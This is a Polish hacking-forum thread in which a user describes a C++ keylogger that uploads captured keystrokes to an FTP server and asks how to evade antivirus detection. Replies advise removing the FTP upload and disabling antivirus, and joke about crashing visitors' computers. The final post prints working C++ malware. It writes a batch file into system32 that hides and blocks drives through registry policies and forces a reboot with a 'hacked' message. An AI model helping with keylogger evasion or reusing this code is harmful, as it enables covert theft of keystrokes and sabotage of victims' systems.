prosty keylog i wykrywanie przez AV

[stefan143]

Napisałem sobie ostatnio prostego keyloga w c++ builder (pierwszy wiekszy projekcik) no ale do sedna.

wykorzystuje biblioteki :
#include <vcl.h>
#include "fstream.h"
#include <time.h>
#include <map>

komponenty z buildera to 2x timer, 1x idftp oraz 1x idmessage

wszystko jest ok, program dziala, logi sie zapisuja do pliku i sa przesylane do ftpa ale jest problem z tym ze podczas kompilacji moj AV kaspersky od razu krzyczy ze to wirus , sprawdzilem plik na http://virusscan.jotti.org to jeszcze dla 4 AV jest to virus (Heur:Trojan.Win32.Generic) . no i moje pytanie to co jest nie tak ze swierzo kompilowany moj program ktory byl robiony od podstaw jest na samym wstepie traktowany jak trojan? moze ktos wie jak to ominac?

 

[In7ount]

każdy program który uzyskuje nie autoryzowane połączenie traktowany jest jak 'trojan'
Zobacz , jak wyrzucisz ftp to nie będzie już ci pikał że to trojan

Wiesz co mnie smieszy ?
dla przykładu AVG 2012 Wykrywa taki oto kod

#include <stdio.h>
int main(void){
puts ("haha");
return 0;
}

jako trojana haha ;p
Najlepiej się pozbyć antywirusów

 

[VR8]

każdy program który uzyskuje nie autoryzowane połączenie traktowany jest jak 'trojan'
Zobacz , jak wyrzucisz ftp to nie będzie już ci pikał że to trojan

Wiesz co mnie smieszy ?
dla przykładu AVG 2012 Wykrywa taki oto kod

jako trojana haha ;p
Najlepiej się pozbyć antywirusów

Niezle

Kiedyś pisałem takiego "wirusa", który wbrew pozorom nie robił nic poza tym że antywirus (BitDefender) tak bardzo próbował się go pozbyć że slabsze kompy siadały.
Jak go znajde to wrzuce...

edit:
W twoim skrypcie VBA32 wykrył Trojan.KillFiles.biv

 

[In7ount]

to ładnie hah ; D
Pamiętam jak zaczynałem z pythonem i nie wiem co zrobiłem że po odpaleniu w pliku konsoli cały explorer.exe siadał haha
Ach te czasy

W czym go pisałeś ?

 

[VR8]

to ładnie hah ; D
Pamiętam jak zaczynałem z pythonem i nie wiem co zrobiłem że po odpaleniu w pliku konsoli cały explorer.exe siadał haha
Ach te czasy

W czym go pisałeś ?

Pisałem go w C++, jednak pamiętam że ten program miał taką składnie, że wystarczyło go przekleić do .php i zmienić nazwy kilku funkcji na te z PHP
Każdemu kto wszedł na stronę siadał komp

 

[In7ount]

poszukaj go ja go trochę przerobię by obecne kompy padały ; D

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" );

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }

^^^ ; D